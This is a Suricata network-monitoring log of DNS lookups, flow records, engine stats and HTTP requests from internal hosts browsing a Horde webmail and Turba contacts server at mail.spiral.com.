{"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:06.871373+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286}} {"timestamp":"2020-02-29T00:04:09.268672+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49249,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:09.585969+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128}} {"timestamp":"2020-02-29T00:04:10.571181+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:10.577609+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42246,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:10.775587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207}} {"timestamp":"2020-02-29T00:04:12.000165+0000","event_type":"stats","stats":{"uptime":13904,"capture":{"kernel_packets":133091,"kernel_drops":0},"decoder":{"pkts":133102,"bytes":92224080,"invalid":180,"ipv4":131665,"ipv6":8,"ethernet":133102,"raw":0,"null":0,"sll":0,"tcp":126621,"udp":4850,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2211,"failed_udp":108},"tx":{"http":4503,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2288}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2253,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22153,"memcap_state":0,"memcap_global":0},"http":{"memuse":104611,"memcap":0}}} {"timestamp":"2020-02-29T00:04:13.000689+0000","flow_id":1392564397028430,"event_type":"flow","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":14,"bytes_toserver":1764,"bytes_toclient":10505,"start":"2020-02-29T00:03:02.078926+0000","end":"2020-02-29T00:03:12.487416+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:13.085632+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:04:13.095623+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32846,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:13.260012+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983}} {"timestamp":"2020-02-29T00:04:13.850697+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18539,"tx_id":1}} {"timestamp":"2020-02-29T00:04:13.858938+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43521,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:14.000532+0000","flow_id":518199234830083,"event_type":"flow","src_ip":"192.168.10.122","src_port":55695,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:12.958211+0000","end":"2020-02-28T23:59:13.067202+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:14.059453+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":227,"tx_id":2}} {"timestamp":"2020-02-29T00:04:14.071587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240}} {"timestamp":"2020-02-29T00:04:15.000366+0000","flow_id":1169518155910251,"event_type":"flow","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1821,"bytes_toclient":2206,"start":"2020-02-29T00:03:09.248939+0000","end":"2020-02-29T00:03:14.259385+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:15.000612+0000","flow_id":1452797018606239,"event_type":"flow","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":32,"pkts_toclient":35,"bytes_toserver":8103,"bytes_toclient":30851,"start":"2020-02-29T00:03:05.494239+0000","end":"2020-02-29T00:03:14.340795+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:17.804624+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:04:17.809849+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62573,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:17.989839+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156}} {"timestamp":"2020-02-29T00:04:19.000229+0000","event_type":"stats","stats":{"uptime":13911,"capture":{"kernel_packets":133116,"kernel_drops":0},"decoder":{"pkts":133128,"bytes":92236380,"invalid":180,"ipv4":131691,"ipv6":8,"ethernet":133128,"raw":0,"null":0,"sll":0,"tcp":126643,"udp":4854,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2213,"failed_udp":108},"tx":{"http":4505,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2290}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2254,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22815,"memcap_state":0,"memcap_global":0},"http":{"memuse":108612,"memcap":0}}} {"timestamp":"2020-02-29T00:04:19.076294+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18583,"tx_id":2}} {"timestamp":"2020-02-29T00:04:20.000426+0000","flow_id":1742161835436144,"event_type":"flow","src_ip":"192.168.10.122","src_port":57837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.108656+0000","end":"2020-02-28T23:59:19.216503+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:20.000623+0000","flow_id":1755910025764076,"event_type":"flow","src_ip":"192.168.10.122","src_port":44575,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.318700+0000","end":"2020-02-28T23:59:19.430067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:21.000491+0000","flow_id":2181365191206253,"event_type":"flow","src_ip":"192.168.10.122","src_port":54269,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:20.386413+0000","end":"2020-02-28T23:59:20.494438+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:22.216488+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58517,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:22.410696+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:04:22.953806+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":28190,"tx_id":2}} {"timestamp":"2020-02-29T00:04:22.963363+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28444,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.150300+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687}} {"timestamp":"2020-02-29T00:04:23.537409+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":609,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.725396+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26993,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.000640+0000","flow_id":2096445098018283,"event_type":"flow","src_ip":"192.168.10.122","src_port":37955,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:23.902635+0000","end":"2020-02-28T23:59:24.013986+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:25.424689+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:25.434576+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10868,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 